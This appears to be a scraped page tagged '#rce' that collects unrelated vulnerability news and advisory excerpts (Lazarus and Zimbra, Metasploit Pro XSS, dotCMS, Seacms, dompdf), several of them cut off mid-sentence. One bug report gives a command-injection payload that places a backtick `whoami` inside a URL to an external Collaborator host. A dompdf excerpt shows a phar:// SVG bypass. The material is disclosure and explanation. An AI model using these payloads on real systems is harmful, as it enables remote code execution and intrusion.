#rce

A new intelligence gathering campaign linked to the prolific North Korean state-sponsored Lazarus Group leveraged known security flaws in unpatched Zimbra devices to compromise victim systems. That's according to Finnish cybersecurity company WithSecure (formerly F-Secure), which codenamed the incident No Pineapple. Targets of the malicious operation included a healthcare research organization

Description: I found a very critical vulnerability on your open source program called RCE (Remote Code Execution) where an attacker can arbitrary execute code in the server Impact: An attacker could execute remote codes on your system Step to Reproduce: 1. Go to My Videos tab https://demo.avideo.com/mvideos 2. Click "Embed a video link" 3. Get your Burp Suite Collaborator link Example: [o4ta880iz4vap09kaqw400po8fe52u.oastify.com](http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com/) 4. Now put this RCE payload in the Video Link field [http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com?`whoami`](http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com/?whoami) then click Save 5. Now go to BurpSuite Collaborator client and see the response

Rapid7 Metasploit Pro versions 4.21.2 and lower suffer from a stored cross site scripting vulnerability, due to a lack of JavaScript request string sanitization. Using this vulnerability, an authenticated attacker can execute arbitrary HTML and script code in the target browser against another Metasploit Pro user using a specially crafted request. Note that in most deployments, all Metasploit Pro users tend to enjoy privileges equivalent to local administrator.

An issue was discovered in dotCMS core 4.x through 22.10.2. An authenticated directory traversal vulnerability in the dotCMS API can lead to Remote Code Execution.

Cybersecurity researchers have disclosed details of two security flaws in the open source ImageMagick software that could potentially lead to a denial-of-service (DoS) and information disclosure. The two issues, which were identified by Latin American cybersecurity firm Metabase Q in version 7.1.0-49, were addressed in ImageMagick version 7.1.0-52, released in November 2022. A

Seacms v12.7 was discovered to contain a remote code execution (RCE) vulnerability via the ip parameter at admin_ ip.php.

Two security holes — one particularly gnarly — could allow hackers the freedom to do as they wish with the popular edge equipment.

Printer exploit chain could be weaponized to fully compromise more than 100 models

Two more supply chain security flaws have been disclosed in AMI MegaRAC Baseboard Management Controller (BMC) software, nearly two months after three security vulnerabilities were brought to light in the same product. Firmware security firm Eclypsium said the two shortcomings were held back until now to provide AMI additional time to engineer appropriate mitigations. The issues, collectively

### Summary The URI validation on dompdf 2.0.1 can be bypassed on SVG parsing by passing `<image>` tags with uppercase letters. This might leads to arbitrary object unserialize on PHP < 8, through the `phar` URL wrapper. ### Details The bug occurs during SVG parsing of `<image>` tags, in src/Image/Cache.php : ``` if ($type === "svg") { $parser = xml_parser_create("utf-8"); xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, false); xml_set_element_handler( $parser, function ($parser, $name, $attributes) use ($options, $parsed_url, $full_url) { if ($name === "image") { $attributes = array_change_key_case($attributes, CASE_LOWER); ``` This part will try to detect `<image>` tags in SVG, and will take the href to validate it against the protocolAllowed whitelist. However, the `$name comparison with "image" is case sensitive, which means that such a tag in the SVG will pass : ``` <svg> <Image xlink:href="phar:///foo"></Ima...